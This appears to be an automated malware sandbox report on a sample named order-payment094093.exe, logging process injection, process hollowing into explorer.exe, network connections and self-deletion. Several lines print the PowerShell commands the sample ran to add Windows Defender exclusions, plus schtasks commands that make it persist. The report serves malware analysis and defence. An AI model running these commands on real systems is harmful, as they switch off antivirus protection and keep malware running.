Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AE9E0 mov eax, dword ptr fs:[00000030h]	9_2_012AE9E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012529F9 mov eax, dword ptr fs:[00000030h]	9_2_012529F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012529F9 mov eax, dword ptr fs:[00000030h]	9_2_012529F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B69C0 mov eax, dword ptr fs:[00000030h]	9_2_012B69C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0122A9D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012549D0 mov eax, dword ptr fs:[00000030h]	9_2_012549D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EA9D3 mov eax, dword ptr fs:[00000030h]	9_2_012EA9D3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov eax, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov eax, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov eax, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov ecx, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov eax, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242835 mov eax, dword ptr fs:[00000030h]	9_2_01242835
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A830 mov eax, dword ptr fs:[00000030h]	9_2_0125A830
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C483A mov eax, dword ptr fs:[00000030h]	9_2_012C483A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C483A mov eax, dword ptr fs:[00000030h]	9_2_012C483A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AC810 mov eax, dword ptr fs:[00000030h]	9_2_012AC810
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AE872 mov eax, dword ptr fs:[00000030h]	9_2_012AE872
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AE872 mov eax, dword ptr fs:[00000030h]	9_2_012AE872
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6870 mov eax, dword ptr fs:[00000030h]	9_2_012B6870
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6870 mov eax, dword ptr fs:[00000030h]	9_2_012B6870
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01232840 mov ecx, dword ptr fs:[00000030h]	9_2_01232840
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01250854 mov eax, dword ptr fs:[00000030h]	9_2_01250854
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224859 mov eax, dword ptr fs:[00000030h]	9_2_01224859
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224859 mov eax, dword ptr fs:[00000030h]	9_2_01224859
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220887 mov eax, dword ptr fs:[00000030h]	9_2_01220887
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AC89D mov eax, dword ptr fs:[00000030h]	9_2_012AC89D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EA8E4 mov eax, dword ptr fs:[00000030h]	9_2_012EA8E4
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0125C8F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0125C8F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124E8C0 mov eax, dword ptr fs:[00000030h]	9_2_0124E8C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F08C0 mov eax, dword ptr fs:[00000030h]	9_2_012F08C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124EB20 mov eax, dword ptr fs:[00000030h]	9_2_0124EB20
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124EB20 mov eax, dword ptr fs:[00000030h]	9_2_0124EB20
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E8B28 mov eax, dword ptr fs:[00000030h]	9_2_012E8B28
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E8B28 mov eax, dword ptr fs:[00000030h]	9_2_012E8B28
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129EB1D mov eax, dword ptr fs:[00000030h]	9_2_0129EB1D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121CB7E mov eax, dword ptr fs:[00000030h]	9_2_0121CB7E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D4B4B mov eax, dword ptr fs:[00000030h]	9_2_012D4B4B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D4B4B mov eax, dword ptr fs:[00000030h]	9_2_012D4B4B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6B40 mov eax, dword ptr fs:[00000030h]	9_2_012B6B40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6B40 mov eax, dword ptr fs:[00000030h]	9_2_012B6B40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EAB40 mov eax, dword ptr fs:[00000030h]	9_2_012EAB40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C8B42 mov eax, dword ptr fs:[00000030h]	9_2_012C8B42
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CEB50 mov eax, dword ptr fs:[00000030h]	9_2_012CEB50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230BBE mov eax, dword ptr fs:[00000030h]	9_2_01230BBE
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230BBE mov eax, dword ptr fs:[00000030h]	9_2_01230BBE
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D4BB0 mov eax, dword ptr fs:[00000030h]	9_2_012D4BB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D4BB0 mov eax, dword ptr fs:[00000030h]	9_2_012D4BB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228BF0 mov eax, dword ptr fs:[00000030h]	9_2_01228BF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228BF0 mov eax, dword ptr fs:[00000030h]	9_2_01228BF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228BF0 mov eax, dword ptr fs:[00000030h]	9_2_01228BF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124EBFC mov eax, dword ptr fs:[00000030h]	9_2_0124EBFC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012ACBF0 mov eax, dword ptr fs:[00000030h]	9_2_012ACBF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01240BCB mov eax, dword ptr fs:[00000030h]	9_2_01240BCB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01240BCB mov eax, dword ptr fs:[00000030h]	9_2_01240BCB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01240BCB mov eax, dword ptr fs:[00000030h]	9_2_01240BCB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220BCD mov eax, dword ptr fs:[00000030h]	9_2_01220BCD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220BCD mov eax, dword ptr fs:[00000030h]	9_2_01220BCD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220BCD mov eax, dword ptr fs:[00000030h]	9_2_01220BCD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CEBD0 mov eax, dword ptr fs:[00000030h]	9_2_012CEBD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125CA24 mov eax, dword ptr fs:[00000030h]	9_2_0125CA24
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124EA2E mov eax, dword ptr fs:[00000030h]	9_2_0124EA2E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01244A35 mov eax, dword ptr fs:[00000030h]	9_2_01244A35
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01244A35 mov eax, dword ptr fs:[00000030h]	9_2_01244A35
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125CA38 mov eax, dword ptr fs:[00000030h]	9_2_0125CA38
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012ACA11 mov eax, dword ptr fs:[00000030h]	9_2_012ACA11
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125CA6F mov eax, dword ptr fs:[00000030h]	9_2_0125CA6F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125CA6F mov eax, dword ptr fs:[00000030h]	9_2_0125CA6F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125CA6F mov eax, dword ptr fs:[00000030h]	9_2_0125CA6F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CEA60 mov eax, dword ptr fs:[00000030h]	9_2_012CEA60
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129CA72 mov eax, dword ptr fs:[00000030h]	9_2_0129CA72
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129CA72 mov eax, dword ptr fs:[00000030h]	9_2_0129CA72
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226A50 mov eax, dword ptr fs:[00000030h]	9_2_01226A50
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230A5B mov eax, dword ptr fs:[00000030h]	9_2_01230A5B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230A5B mov eax, dword ptr fs:[00000030h]	9_2_01230A5B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228AA0 mov eax, dword ptr fs:[00000030h]	9_2_01228AA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01228AA0 mov eax, dword ptr fs:[00000030h]	9_2_01228AA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01276AA4 mov eax, dword ptr fs:[00000030h]	9_2_01276AA4
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80 mov eax, dword ptr fs:[00000030h]	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F4A80 mov eax, dword ptr fs:[00000030h]	9_2_012F4A80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01258A90 mov edx, dword ptr fs:[00000030h]	9_2_01258A90
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125AAEE mov eax, dword ptr fs:[00000030h]	9_2_0125AAEE
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125AAEE mov eax, dword ptr fs:[00000030h]	9_2_0125AAEE
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01276ACC mov eax, dword ptr fs:[00000030h]	9_2_01276ACC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01276ACC mov eax, dword ptr fs:[00000030h]	9_2_01276ACC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01276ACC mov eax, dword ptr fs:[00000030h]	9_2_01276ACC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220AD0 mov eax, dword ptr fs:[00000030h]	9_2_01220AD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01254AD0 mov eax, dword ptr fs:[00000030h]	9_2_01254AD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01254AD0 mov eax, dword ptr fs:[00000030h]	9_2_01254AD0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A8D20 mov eax, dword ptr fs:[00000030h]	9_2_012A8D20
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123AD00 mov eax, dword ptr fs:[00000030h]	9_2_0123AD00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123AD00 mov eax, dword ptr fs:[00000030h]	9_2_0123AD00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123AD00 mov eax, dword ptr fs:[00000030h]	9_2_0123AD00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01216D10 mov eax, dword ptr fs:[00000030h]	9_2_01216D10
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01216D10 mov eax, dword ptr fs:[00000030h]	9_2_01216D10
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01216D10 mov eax, dword ptr fs:[00000030h]	9_2_01216D10
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01254D1D mov eax, dword ptr fs:[00000030h]	9_2_01254D1D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00B779E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_00B779E1

Source: C:\Users\user\Desktop\order-payment094093.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\explorer.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\explorer.exe

Jump to behavior

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.18.188.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.64.119.254 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\order-payment094093.exe

Memory written: C:\Users\user\Desktop\order-payment094093.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\order-payment094093.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 4004
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Thread register set: target process: 4004

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\order-payment094093.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\order-payment094093.exe	Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: A90000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: A60000

Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Users\user\Desktop\order-payment094093.exe "C:\Users\user\Desktop\order-payment094093.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Users\user\AppData\Roaming\NFOLsr.exe "C:\Users\user\AppData\Roaming\NFOLsr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Source: explorer.exe, 0000000A.00000002.3316137070.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2132925553.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.2129075558.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3315327195.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
Source: explorer.exe, 0000000A.00000002.3316137070.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2132925553.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000003.2979100485.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3327443671.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3076446075.00000000098E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Users\user\Desktop\order-payment094093.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
